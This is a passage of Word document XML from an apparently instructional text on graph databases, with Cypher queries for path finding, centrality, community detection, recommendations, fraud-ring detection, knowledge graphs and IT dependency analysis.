    <w:p w14:paraId="271589A7" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>RETURN path, totalCost</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="004E8EA8" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="60C38557" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>// All paths (find all connections up to length 5)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47DF514B" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>MATCH path = (a:Person {name:"Alice"})-[*1..5]-(b:Person {name:"Eve"})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D3E87AE" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>RETURN path</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42E80B75" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4.2 Centrality (Finding Important Nodes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B0C5AE6" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Cypher</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="040809C4" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>// PageRank: which nodes are most "important" (most referenced by important nodes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="436B605F" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:lastRenderedPageBreak/>
        <w:t>CALL gds.pageRank.stream('social-graph')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="095CF0E2" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>YIELD nodeId, score</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D91D5CF" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>RETURN gds.util.asNode(nodeId).name AS name, score</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EC43984" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>ORDER BY score DESC LIMIT 10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78DF7C8E" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="30BA3A50" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>// Betweenness centrality: which nodes are "bridges" in the network</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="735BEA19" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>CALL gds.betweenness.stream('social-graph')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2830B586" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>YIELD nodeId, score</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FB093A5" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>RETURN gds.util.asNode(nodeId).name, score</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="641D0318" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>ORDER BY score DESC LIMIT 10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="480CAE1F" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4.3 Community Detection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2980C583" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Cypher</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C25FBCB" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>// Louvain: detect communities (clusters of tightly connected nodes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68398657" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>CALL gds.louvain.stream('social-graph')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01E3B185" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>YIELD nodeId, communityId</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="171DDCBD" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>RETURN communityId, collect(gds.util.asNode(nodeId).name) AS members</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FA9F296" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>ORDER BY size(members) DESC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65CC509D" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5. Graph Database Use Cases</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A3D7511" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5.1 Social Networks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52C10BCE" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52EEB6A0" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Data model:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AE0FB55" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  (User)-[:FOLLOWS]-&gt;(User)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1416B23D" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  (User)-[:LIKES]-&gt;(Post)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45C09724" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  (User)-[:POSTED]-&gt;(Post)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="087316C6" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  (Post)-[:TAGGED]-&gt;(Topic)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="423D637A" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="481E05FA" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:lastRenderedPageBreak/>
        <w:t>Queries:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42D82CAD" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  - "People you may know" (friends-of-friends not already connected)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A36AF0D" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  - "Mutual friends" (intersection of friend lists)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EE68D7F" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  - "Influence propagation" (how does a message spread through the network)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DCEF9B6" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  - "Community detection" (find groups of tightly connected users)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="584E73E9" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5.2 Recommendation Engines</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54C1A5B5" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Cypher</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23FEF875" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>// "People who bought X also bought Y"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="078E62F8" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>MATCH (u:User)-[:PURCHASED]-&gt;(p:Product {name: "iPhone"})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C777BFD" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>MATCH (u)-[:PURCHASED]-&gt;(other:Product)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EDC8616" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>WHERE other.name &lt;&gt; "iPhone"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D10A022" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>RETURN other.name, COUNT(u) AS co_purchases</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41DBFD49" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>ORDER BY co_purchases DESC LIMIT 10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F90B78E" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="5DDE9ADA" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>// "Recommended based on your connections' interests"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FE775FC" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>MATCH (me:User {id: $userId})-[:FRIENDS_WITH]-&gt;(friend)-[:LIKES]-&gt;(item)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DA627C1" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>WHERE NOT (me)-[:LIKES]-&gt;(item)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A4FDD78" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  AND NOT (me)-[:DISLIKED]-&gt;(item)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44F033F0" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>RETURN item, COUNT(friend) AS friend_count</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E0554E1" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>ORDER BY friend_count DESC LIMIT 20</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D961BA6" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5.3 Fraud Detection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42AF75F6" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="604D4338" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Pattern: "Ring of accounts transferring money in a cycle"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F18A7EB" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="3FEE9D6A" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>MATCH path = (a:Account)-[:TRANSFERRED*3..8]-&gt;(a)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4019CA71" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>WHERE ALL(r IN relationships(path) WHERE r.amount &gt; 10000)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38783036" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  AND ALL(r IN relationships(path) WHERE r.timestamp &gt; datetime() - duration({days: 7}))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75DE5551" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>RETURN path</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D7BEC20" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="461E7073" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Finding this pattern in a relational database requires self-JOINs of unknown depth — impractical.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18CCCA1D" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>In a graph database: natural pattern match, bounded traversal.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03728851" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5.4 Knowledge Graphs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BE42D5E" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BAD53DA" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>(Einstein:Person)-[:BORN_IN]-&gt;(Ulm:City)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2376B0D5" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>(Einstein:Person)-[:DEVELOPED]-&gt;(Relativity:Theory)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B6A9EAB" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>(Relativity:Theory)-[:RELATED_TO]-&gt;(Physics:Field)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6455BDF1" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>(Einstein:Person)-[:WORKED_AT]-&gt;(Princeton:University)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4864ACC1" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>(Princeton:University)-[:LOCATED_IN]-&gt;(NewJersey:State)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="594438A9" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="293E8F5A" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Query: "Which theories were developed by people who worked at universities in New Jersey?"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="600E2F02" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>MATCH (p:Person)-[:WORKED_AT]-&gt;(u:University)-[:LOCATED_IN]-&gt;(:State {name: "New Jersey"})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B2E4C3A" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>MATCH (p)-[:DEVELOPED]-&gt;(t:Theory)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A2F0125" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>RETURN p.name, t.name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="584BCB7F" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5.5 Network and IT Infrastructure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ECAA5EB" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F4C1FF4" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>(Server)-[:CONNECTS_TO]-&gt;(Switch)-[:CONNECTS_TO]-&gt;(Router)-[:CONNECTS_TO]-&gt;(Internet)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5672CFF2" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>(App)-[:RUNS_ON]-&gt;(Server)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DA05DF2" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>(App)-[:DEPENDS_ON]-&gt;(Database)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C40B706" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>(Database)-[:RUNS_ON]-&gt;(Server)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39BA3E2B" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="38EFBB0F" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Impact analysis: "If Server-42 goes down, what's affected?"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FE7F435" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>MATCH (s:Server {name: "server-42"})&lt;-[:RUNS_ON|DEPENDS_ON*1..5]-(affected)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60907336" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>RETURN affected</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20A0D648" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="55493EB4" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Root cause analysis: "Why is App-X slow?"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75F76238" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>MATCH path = (app:App {name: "App-X"})-[:DEPENDS_ON*1..10]-&gt;(dep)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E7FEE96" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>WHERE dep.status = "degraded"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CF0CE39" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>RETURN path</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D2469D4" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>6. When to Use a Graph Database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024"/>
        <w:gridCol w:w="4326"/>
      </w:tblGrid>
      <w:tr w:rsidR="00875520" w:rsidRPr="00875520" w14:paraId="24AA441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FCAD14" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00875520">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>✓ Graph DB Excels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88A18B" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00875520">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>✗</w:t>
            </w:r>
            <w:r w:rsidRPr="00875520">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Graph DB Poor Fit</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00875520" w:rsidRPr="00875520" w14:paraId="7F9CA73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01E93D" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Relationship-heavy queries (social, recommendations)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5D9150" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Simple CRUD with no complex relationships</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00875520" w:rsidRPr="00875520" w14:paraId="14A48A4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C6E9D4" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Variable-depth traversals (BFS, DFS, shortest path)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053A90" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
